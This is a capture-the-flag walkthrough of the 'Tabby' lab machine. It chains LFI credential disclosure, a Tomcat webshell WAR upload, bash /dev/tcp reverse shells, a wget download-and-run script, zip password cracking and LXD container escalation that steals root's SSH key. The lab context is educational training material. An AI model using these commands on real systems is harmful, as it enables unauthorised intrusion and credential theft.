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6th October 2020 / Document No D20.101.115

Prepared By: bertolis

Machine Author: egre55

Difficulty: Easy

Classification: Official
Tabby is a easy difficulty Linux machine. Enumeration of the website reveals a second website
that is hosted on the same server under a different vhost. This website is vulnerable to Local File
Inclusion. Knowledge of the OS version is used to identify the tomcat-users.xml file location.
This file yields credentials for a Tomcat user that is authorized to use the /manager/text
interface. This is leveraged to deploy of a war file and upload a webshell, which in turn is used to
get a reverse shell. Enumeration of the filesystem reveals a password protected zip file, which can
be downloaded and cracked locally. The cracked password can be used to login to the remote
machine as a low privileged user. However this user is a member of the LXD group, which allows
privilege escalation by creating a privileged container, into which the host's filesystem is
mounted. Eventually, access to the remote machine is gained as root using SSH.

Skills Required
Web Enumeration
Linux Enumeration

Skills Learned
Tomcat Text Interface WAR File Upload
ZIP Cracking
LXD Abuse
ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f
1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV

Nmap output reveals that this is a Ubuntu server, running SSH, Apache and Tomcat on their
default ports. Let's enumerate the website titled "Mega Hosting".

This a website for a company that provides hosting services. Having a closer at the website, there
is a link stating that the company has recently recovered from a data breach. The link points to . Let's add this domain name to the
/etc/hosts file.

sudo -- sh -c "echo ' megahosting.htb' >> /etc/hosts"

Now let's click the link again.

We notice that we are being redirected to .
It's worth noting that statement seems to be a filename passed as input to the parameter file
of the page news.php . Let's check if this is vulnerable to Local File Inclusion (LFI), by trying to load
/etc/passwd .
Of the above payloads, ../../../../etc/passwd was successful. We note that ash is a system

Let's try to access Tomcat on port 8080.

Scanning for hidden directories reveals the well-known Tomcat /manager page.

This is a default page that allows users to manage web applications. Tomcat's manager page
requires authentication.

Attempting to log in with common credentials like admin / admin is not successful. However, if
we click cancel we get a 401 Unauthorized message. This page reveals that the credentials are
in the file conf/tomcat-users.xml .
Let's search online for the default path of the Tomcat installation, in order to check if we can
access it through the LFI vulnerability.

According to the first result, and since our instance of tomcat is version 9, the default installation
directory is /usr/local/tomcat9 . Let's combine these information and try to access
conf/tomcat-users.xml from LFI vulnerability found earlier on Apache.

Clicking CTRL + U to view the page source doesn't show any text. Unfortunately this request
returned a blank page. Let's check if the file tomcat-users.xml is located in a different path
inside Tomcat's default installation directory.

Clicking at the first result we can see the file structure of the directory /usr/share/tomcat9 .
This reveals that Tomcat stores the tomcat-users.xml file in the directory
/usr/share/tomcat9/etc . Let's try to access this file again. This time we can see the file
contents in the HTML source code.

The file is found to contain the credentials tomcat / $3cureP4s5w0rd123! . As the roles xml
attribute shows that this user is a member of admin-gui and manager-script . The manager-gui
role that allows access to the /manager page is not assigned.
Let's scan this URL and see if there are any files or directories hosted there.

wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404

Wfuzz reveals the above directories. We can search online for the /manager/text interface.

This returns Tomcat's official documentation, which states that commands can be executed
through this interface.
As the Tomcat user is assigned the manager-script role, we should be permitted to interact with
/manager/text . Let's try listing the available hosts on Tomcat.


This is successful. It is also well-known that Tomcat deploys Java web applications. Let's check if
we can deploy a project using the text interface.
Searching online reveals official Tomcat documentation explaining how this can be done.

According to this, it is possible to create a war file and deploy it to the server. A war file is an
archived Java application. Let's download a JSP webshell and create the war file. In order to
create a war file we can use zip .

zip webshell.war 7445a3cfaaf80f1f5a53-

Now that we've archived the webshell, let's specify the file we want to upload, set the application
name to webshell and the update value to true , and try to deploy it.

curl -u ${USERNAME}:${PASSWORD} -T webshell.war

Setting the update parameter to true , makes sure that any existing project will be undeployed
before the new deployment.
The file was deployed successfully. Let's try to access it from the browser.

This is successful. We can execute commands on the remote machine as the user tomcat . Let's
start a listener on our local machine.

nc -lvp 5555

Then try to create a reverse shell, executing the following command from the webshell.

bash -i >& /dev/tcp/ 0>&1

Getting a reverse shell using the above command didn't work. Let's create a reverse shell, start an
HTTP server locally and download it to the remote machine.

echo "0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196" > shell

php -S

From the webshell, input the following commands to download and run the script.
wget -O /tmp/shell
chmod +x /tmp/shell
bash /tmp/shell

This is successful and we receive a reverse shell. We can now spawn a PTY shell using Python3.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Lateral Movement
Enumeration of the directories and files reveals the archive
/var/www/html/ , that is owned by the user ash . Trying to unzip this file
returns a message prompting for a password.

We could download the zip file and try to crack the password locally. An easy way to do this is to
get a base64-encoded representation of the zip file, and decode it back on our local machine. We
use the -w0 option so that the output is returned in a continuous line.

base64 -w0

Copy the output and issue the following command to recreate the zip file locally. Replace with
your own output as appropriate.


Now we can try to crack the zip file using fcrackzip in a dictionary attack using the
rockyou.txt wordlist. We use the option -D to specify that this will be a dictionary attack, and -
u to specify the unzip process.

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt

After some seconds, the password is found. Decompressing the file using the
password admin@it reveals some files and directories from the web application. Since this zip
file is owned by user ash , let's try to login to the system using the credentials ash / admin@it .

su ash

This is successful and we have gained access to the system as ash . The user flag is located in
/home/ash/user.txt .
Privilege Escalation
Enumeration of the user reveals membership of the lxd group.

The lxd (Linux Daemon) is a system container manager, that controls lxc (Linux Container).
Linux Container (LXC) is a virtualization technology that runs isolated containers using a single
Linux kernel. It is possible for the user ash to create a privileged container and then use it to
mount the host filesystem. To achieve this, we can download an Alpine image, and then upload it
to the remote machine. Lets download and build the image locally. The image can be found here.

git clone

cd lxd-alpine-builder/

A compressed file alpine-v3.12-x86_64-20201106_1855.tar.gz is created. Let's stand up an

HTTP server.

php -S

Then download the file to the machine.

cd /home/ash

On the remote machine, run the following to initiate lxd , inputting no to all prompts.

lxd init

Next, we run the following command to import the alpine image.

lxc image import ./alpine-v3.12-x86_64-20201106_2000.tar.gz --alias alpine

To check if the image is successfully imported, type the following.

lxc image list

Next, we need to make the container privileged, and mount the filesystem, before starting the

lxc init alpine mycontainer -c security.privileged=true

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root
lxc start mycontainer

Once the container is started, we can access it by typing the following command.

lxc exec mycontainer /bin/sh

The container has been created successfully and we have root access on it. Enumeration of
/mnt/root reveals the private SSH key /root/.ssh/id_rsa . Use cat to display the contents.

cat /mnt/root/root/.ssh/id_rsa

On our local machine, we create a new file.

vim id_rsa

Then we paste the key and give the appropriate permissions to the file.

chmod 400 id_rsa

Finally, we execute the following command to connect as root

ssh -i id_rsa [email protected]

The root flag is located in /root/root.txt .

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